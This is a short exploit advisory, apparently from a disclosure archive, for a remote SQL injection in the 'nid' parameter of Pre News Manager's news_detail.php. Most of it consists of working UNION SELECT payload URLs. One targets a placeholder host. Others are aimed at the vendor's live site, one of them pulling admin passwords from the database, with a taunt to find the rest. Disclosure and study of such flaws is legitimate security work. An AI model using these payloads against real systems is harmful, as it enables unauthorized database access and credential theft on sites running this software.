Pre News Manager suffers from a remote SQL injection vulnerability in news_detail.php.
ecd572294f3f8ce5456434cffd6fc1f0aa142a1fd9a5304f22b2a724183f8d3f
Pre News Manager[id]Remote SQL Injection Vulnerability
--------------------------------------------------------------------------------
----------------------------------------------------------------
script : Pre News Manager
script : http://www.preprojects.com/pclphp.asp
Risk : High
----------------------------------------------------------------
Dicovered by : d3b4g
email : bl4ckend[at]gmail[dot]com
Site. www.bl4ck3nd.info
----------------------------------------------------------------
Exploit : http://www.target.com/[path]/news_detail.php?nid=-1+union+all+select+1,2,3,@@version,5,6,7/*
Live demo: http://www.preproject.com/news%20manager/news_detail.php?nid=-1+union+all+select+1,2,3,@@version,5,6,7/*
For password : http://www.preproject.com/news%20manager/news_detail.php?nid=-1+union+all+select+1,2,3,concat(password),5,6,7+from+admin/*
Rest find =P
----------------------------------------------------------------
----------------------------------------------------------------
Greetz: str0ke,,Hotlism.org,All my friends
-----------------------------------------------------------------
Proud to be a maldivian :))
=======================